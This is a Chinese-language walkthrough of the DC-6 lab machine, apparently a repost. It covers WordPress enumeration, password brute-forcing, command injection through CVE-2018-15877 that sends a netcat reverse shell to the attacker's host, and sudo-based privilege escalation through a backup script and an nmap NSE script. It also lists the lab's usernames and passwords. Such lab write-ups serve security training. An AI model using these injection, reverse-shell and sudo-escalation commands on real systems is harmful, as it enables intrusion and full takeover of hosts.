1.使用nmap进行信息搜集,存活主机,端口
192.168.85.184是存活主机,发现开放22,80端口
2.访问192.168.85.184的80端口
发现被重定向了,修改hosts文件
vim /etc/hosts
添加一行
192.168.85.174 wordy
3.对网站进行信息搜集并进行相关利用
找到一段信息
主要是说插件安全的问题,估计利用wordpress插件的漏洞
访问http://192.168.85.184/wp-includes,发现目录遍历,找到一些插件,尝试搜索相关漏洞利用,失败的
cms通过观察是wordpress,要知道wordpress有哪些漏洞就要知道版本
使用dirb对目录进行扫描
dirb http://192.168.85.184/
发现后台目录/wp-admin
尝试弱口令,失败
尝试sql注入,万能密码失败
4.使用wpscan对网站进行扫描
知道wordpress有哪些漏洞就要知道版本
扫描出版本 5.1.1,没找到漏洞
做靶机时要看一下官网描述
官网描述
只有一个flag,在root目录里
官网线索
主要说使用这个命令会节省你的时间
5.使用wpscan进行爆破
扫描用户名并写入user.txt
wpscan --url http://192.168.85.184 -e u
5个用户名写入user.txt
admin
mark
graham
sarah
jens
密码字典
gunzip rockyou.txt.gz #解压
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
爆破
wpscan --url http://192.168.85.184 -U user.txt -P pass.txt
用户名 mark
密码 helpdesk01
6.登录后台,寻找可以利用点
登录成功
在一些wordpress版本中,是可以上传插件和主题的,可以在这个地方直接上传一句话木马,注意上传插件时可能会失败,但是当你查看文件时时上传成功的,因为上传插件时是先上传在解压安装的,之后可以在msf的php或linux马继续上线,进行下一步操作
没有发现上传的位置
发现一个插件,搜索相关漏洞
找到CVE-2018-15877,是命令执行漏洞
7.利用cve-2018-15877
在 Activity Monito的tools处有命令执行
在3处输入命令,在4处点击执行,3处有长度限制,f12修改最大长度
有两个思路
写一句话木马
反弹shell
写一句话木马失败,可能是权限问题
3处反弹shell
127.0.0.1|nc -e /bin/bash 192.168.85.129 4455
kali nc监听
nc -lvnp 4455
python进入交互式会话
python -c ’import pty;pty.spawn("/bin/bash")'
成功反弹
8.对主机进行信息搜集,进行提权
查看内核版本,版本是4.0的版本,太高没有找到漏洞
uname -a
当前权限www-data
把有权限的地方都看一看
进入家目录
进入到jens的家目录,发现一个备份backups.sh,查看内容,是打包web根目录下的文件
这个地方想到了linux提权中的打包提权,查看权限是jens权限,不是root权限
查找suid权限,发现sudo
sudo -l #查看当前用户的一些sudo权限
继续搜集
进入mark家目录,发现graham密码
username:graham
passwd:GSo7isUM1D4
9.使用graham用户登录ssh或su 切换用户
ssh 192.168.85.184 -l graham
GSo7isUM1D4
执行下面命令发现可以jens执行backups.sh
sudo -l
可以不需要jens密码以jens权限执行backups.sh
当写入赋予find的s权限,在作为打包命令执行的参数执行前面的命令执行时,是不能执行的,因为sudo文件的一些命令被禁止了以root权限执行
有一个思路看一下其他用户登录时sudo -l可以执行什么,但是使用前面搜集的两个密码登录都失败了
还有一个思路可以写入/bin/bash,sudo可以切换到jens用户
echo '/bin/bash'>>/home/jens/backups.sh
#sudo -u以指定用户执行
sudo -u jens ./home/jens/backups.sh
成功切换到jens用户
10.nmap提权
执行以下命令,发现可以不需要密码以root执行nmap命令
sudo -l
写一个bash,以root权限执行文章来源:https://www.toymoban.com/news/detail-429666.html
echo 'os.execute('/bin/bash')' >1.nse
sudo nmap --script=1.nse
id
参考文章:
dc-6文章来源地址https://www.toymoban.com/news/detail-429666.html
到了这里,关于dc-6靶机的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!